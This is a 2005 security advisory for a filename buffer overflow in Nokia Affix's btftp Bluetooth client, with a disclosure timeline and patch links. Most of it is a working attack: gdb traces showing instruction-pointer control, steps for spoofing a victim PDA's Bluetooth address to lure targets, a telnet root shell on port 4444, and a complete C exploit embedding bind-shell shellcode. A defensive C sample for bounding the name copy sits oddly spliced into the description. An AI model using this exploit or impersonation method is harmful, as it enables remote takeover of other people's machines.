DMA[2005-0712a] - 'Nokia Affix Bluetooth btftp client buffer overflow'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References: 
http://www.digitalmunition.com/DMA[2005-0712a].txt

Description: 
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia
Research Center in Helsinki and released under GPL. Affix supports the core
Bluetooth protocols like HCI, L2CAP 1.1, L2CAP 1.2, RFCOMM, SDP and various
Bluetooth profiles. Affix consists of 'affix-kernel', which provides kernel
modules, and 'affix', which provides control tools, libraries, and server
daemons.

Although Nokia believes that Affix is a useful piece of software, please bear
in mind that it is not an official Nokia product, but a result of the research
activity of Nokia Research Center.

The Affix Bluetooth client utility 'btftp' contains a buffer overflow in the
processing of long filenames. By placing a 102 character filename into a public
Bluetooth share you are able to overwrite the eip (on an x86 version) of the
btftp client.
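The defect described above is the classic one of copying a peer-supplied name into a fixed stack buffer without checking its length. As an added illustration, not code from the advisory or from Affix itself, the following C shows how a listing routine can bound that copy and reject oversized entries before they reach the buffer. The buffer size NAME_BUF_SIZE, the function names, and the sample listing (built from the advisory's 'ls' output, with the 102-byte name reconstructed as 98 'A's followed by "DCBA") are assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed size of the fixed buffer a listing routine keeps for one entry
 * name. The advisory does not state the real size used in Affix; 64 is a
 * value chosen for this example. */
#define NAME_BUF_SIZE 64

/* Bounded copy of a peer-supplied entry name into a fixed buffer.
 * Returns 0 on success and -1 when the name (plus its NUL) does not fit.
 * On failure dest is left as an empty string so no partial data is used. */
int copy_entry_name(char *dest, size_t dest_size,
                    const char *src, size_t src_len)
{
    if (dest == NULL || dest_size == 0)
        return -1;
    dest[0] = '\0';
    if (src == NULL || src_len >= dest_size)
        return -1;                 /* would overflow or leave no room for NUL */
    memcpy(dest, src, src_len);
    dest[src_len] = '\0';
    return 0;
}

/* Policy check applied before any copy: the name must be non-empty, fit the
 * buffer, and contain no control characters (a terminal-oriented client
 * should never echo raw control bytes from a remote listing). */
int entry_name_is_safe(const char *name, size_t len)
{
    if (name == NULL || len == 0 || len >= NAME_BUF_SIZE)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c < 0x20 || c == 0x7f)
            return 0;
    }
    return 1;
}

/* Walk a listing the way a hardened client would; returns how many entries
 * were accepted. Rejected entries are reported and skipped instead of being
 * copied into the stack buffer. */
int process_listing(const char **names, size_t count)
{
    char buf[NAME_BUF_SIZE];
    int accepted = 0;
    for (size_t i = 0; i < count; i++) {
        size_t len = strlen(names[i]);
        if (!entry_name_is_safe(names[i], len)) {
            fprintf(stderr, "entry %zu rejected (%zu bytes)\n", i, len);
            continue;
        }
        if (copy_entry_name(buf, sizeof buf, names[i], len) != 0)
            continue;              /* cannot happen after the check; kept for safety */
        printf("entry %zu ok: %s\n", i, buf);
        accepted++;
    }
    return accepted;
}

/* Constructed sample listing modelled on the advisory's 'ls' output: one
 * 102-byte name (98 'A's followed by "DCBA") and three ordinary folder names. */
int demo_listing(void)
{
    static char overlong[103];
    memset(overlong, 'A', 98);
    memcpy(overlong + 98, "DCBA", 5);   /* copies the terminating NUL too */
    const char *names[] = { overlong, "Faxes", "New Folder", "SC Info" };
    return process_listing(names, 4);   /* 3: the 102-byte name is rejected */
}

/* Shows that the raw bounded copy refuses the overlong name on its own. */
int demo_overlong_rejected(void)
{
    char buf[NAME_BUF_SIZE];
    char name[103];
    memset(name, 'A', 102);
    name[102] = '\0';
    return copy_entry_name(buf, sizeof buf, name, 102);   /* -1 */
}

int main(void)
{
    int ok = demo_listing();
    printf("%d of 4 entries accepted\n", ok);
    return demo_overlong_rejected() == -1 ? 0 : 1;
}
```

The check is deliberately split in two: entry_name_is_safe() is the policy a client applies to anything a remote OBEX peer sends, and copy_entry_name() is the last line of defence that refuses to write past the buffer even if a caller forgets the policy check.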

In this example the machine 'frieza' (00:11:95:4f:60:1f) is running btsrv with
OBEX File Transfer.

Place a test file in the public bluetooth share. 
root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "41" x 98' . "DCBA"`

Connect from a vulnerable client machine in order to demonstrate the overflow. 

Starting program: /usr/bin/btctl ftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
-----           0               AAAAAAAAAAAAA...AAAAAAAAAAAAAADCBA
d----           0               Faxes
d----           0               New Folder
d----           0               SC Info

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()

(gdb) i r
eax            0x10     16
ecx            0x0      0
edx            0x4001a1e3       1073848803
ebx            0x41414141       1094795585
esp            0xbffffbc0       0xbffffbc0
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41424344       0x41424344

(gdb) x/4s $esp-100
0xbffffb5c:      " Info"
0xbffffb62:      "er"
0xbffffb65:      'A' <repeats 87 times>, "DCBA"
0xbffffbc1:      " \001@À\217\005\b"

As a quick test we will use anathema@xxxxxxxxxx's 0xff-less execve() /bin/sh
shellcode and a bit of perl to see if we can execute code.

root@frieza:~# cd /var/spool/affix/Inbox/
root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "\x90" x (94-45)'``../ffless``perl -e 'print "\x5b\xfb\xff\xbf" x10 '`
root@frieza:/var/spool/affix/Inbox# ls
?????????????????????????????????????????????????????0?.bin@???.sh!@?F?)??F??v??F??????K??S???[???[???[???[???[???[???[???[???[???[???

As you can see we are able to run our payload on the client machine; however, in
this case the shellcode needs to be swapped out for something more useful.

threat:~# btftp
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
-rwdx           1512            ffless.c
-rwdx           12605           ffless
-rwdx           0                                           °
                                                               Í
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000c20 in ?? () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-2.05b# 

Keep in mind that in order to exploit this the attacker MUST be able to
convince the target to browse an OBEX file share that is under the control of
the attacker. Using an Ericsson ROK 101 008 Bluetooth chip will increase our
chances of success. An example impersonation scenario follows.

First, let's find someone to impersonate.

root@frieza:~# btctl discovery
Searching 8 sec ...
Searching done. Resolving names ...
done.
+1: Address: 00:0c:76:46:f0:21, Class: 0xB20104, Key: "no", Name: "threat"
   Computer (Desktop) [Networking,Object Transfer,Audio,Information]
+2: Address: 00:10:60:29:4f:f1, Class: 0x420210, Key: "no", Name: "Bluetooth Modem"
   Phone (Wired Modem/VoiceGW) [Networking,Telephony]
+3: Address: 00:04:3e:65:a1:c8, Class: 0x120110, Key: "no", Name: "Pocket_PC"
   Computer (Handheld PC/PDA) [Networking,Object Transfer]

Let's pretend to be some poor chap's PDA! We need to steal his BD_ADDR first.

root@frieza:~# btctl
bt0     01:02:03:04:05:06
       Flags: UP DISC CONN
       RX: acl:159 sco:0 event:97 bytes:4810 errors:0 dropped:0
       TX: acl:168 sco:0 cmd:29 bytes:19267 errors:0 dropped:0
       Security: service pair [-auth, -encrypt]
       Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
       Role: deny switch, remain slave

root@frieza:~# wget http://www.digitalmunition.com/setbd-affix.c
--11:50:18--  http://www.digitalmunition.com/setbd-affix.c
           => `setbd-affix.c'
Resolving www.digitalmunition.com... 195.74.102.163
Connecting to www.digitalmunition.com[195.74.102.163]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,951 [text/plain]

100%[================================================================================>]
 2,951         --.--K/s

11:50:19 (29.36 KB/s) - `setbd-affix.c' saved [2951/2951]

root@frieza:~# cc -o setbd-affix setbd-affix.c -laffix

root@frieza:~# ./setbd-affix 00:04:3e:65:a1:c8
Using BD_ADDR from command line
Setting BDA to 00:04:3e:65:a1:c8

root@frieza:~# btctl reset
root@frieza:~# btctl down
root@frieza:~# btctl up
btctl: cmd_initdev: Unable to start device (bt0)
root@frieza:~# btctl up
root@frieza:~# btctl
bt0     00:04:3e:65:a1:c8
       Flags: UP DISC CONN
       RX: acl:159 sco:0 event:126 bytes:5796 errors:0 dropped:0
       TX: acl:168 sco:0 cmd:52 bytes:19885 errors:0 dropped:0
       Security: service pair [-auth, -encrypt]
       Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
       Role: deny switch, remain slave

root@frieza:~# btctl name "Pocket_PC"

God I love my ROK chip!

Start up btsrv and wait for a connection from your target. 

btsrv: main: btsrv started [Affix 2.1.2].
btsrv: start_service: Bound service Serial Port to port 1
btsrv: start_service: Bound service Dialup Networking to port 2
btsrv: start_service: Bound service Dialup Networking Emulation to port 3
btsrv: start_service: Bound service Fax Service to port 4
btsrv: start_service: Bound service LAN Access to port 5
btsrv: start_service: Bound service OBEX File Transfer to port 6
btsrv: start_service: Bound service OBEX Object Push to port 7
btsrv: start_service: Bound service Headset to port 8
btsrv: start_service: Bound service HeadsetAG to port 9
btsrv: start_service: Bound service HandsFree to port 10
btsrv: start_service: Bound service HandsFreeAG to port 11

You can tell that the target has connected by looking for the following in your
btsrv logs.

btsrv: handle_input: Connection from 00:0c:76:46:f0:21
channel 6 (OBEX File Transfer Profile)
btsrv: execute_cmd: Socket multiplexed to stdin/stdout
btsrv: signal_handler: Sig handler : 2

Upon connecting and performing a file list the target would see the following. 

threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp>  open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb    6               uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
           Ï­¹¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0

At this point your payload is running. 

After they have been exploited you could use a hijacked PAND connection to
obtain your shell prompt, or perhaps write some Bluetooth-aware shellcode.

root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found


Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/affix_320_sec.patch
http://affix.sourceforge.net/affix_212_sec.patch

This is the basic timeline associated with this bug.

07/12/05 Public disclosure
07/11/05 Noticed that a security update (patch for affix-3.2.0) had been posted 07/01/05
07/06/05 Ask Carlos for update... 
07/05/05 str0ke dropped code on milw0rm - http://www.milw0rm.com/id.php?id=1081
06/17/05 Carlos.Chinea stated "you are using a old version of affix...Please update"
06/14/05 Carlos.Chinea contacted

-KF


/*

Remote Nokia Affix btftp client exploit
by kf_lists[at]secnetops[dot]com

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
        FILE *malfile;

        /* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex
           http://metasploit.com */
        unsigned char scode[] =
        "\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99"
        "\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34"
        "\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d"
        "\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\xbd"
        "\x54\x6e\x62\x0c\xcf\xad\xb9\xbf\x29\x88\xfd\xde\x0a\x84\x32\x07"
        "\x29\xd1\xfd\xde\xd0\x97\xc9\xee\x92\xbc\x58\x71\xb6\x9d\x58\x36"
        "\xb6\x8c\x59\x30\x10\x0d\x62\x0d\x10\x0f\xfd\xde";

        /* The filename itself is the payload; the file contents are irrelevant. */
        char buf[1024];
        memset(buf, '\0', sizeof(buf));
        memset(buf, '\x90', 94);
        strcat(buf + 94, "\x75\xfb\xff\xbf");
        strcat(buf + 98, "\x75\xfb\xff\xbf");
        memset(buf + 102, '\x90', 40);
        strcat(buf + 142, (const char *)scode);

        if (!(malfile = fopen(buf, "w+"))) {
                printf("error opening file\n");
                exit(1);
        }

        fprintf(malfile, "pwned\n");
        fclose(malfile);
        return 0;
}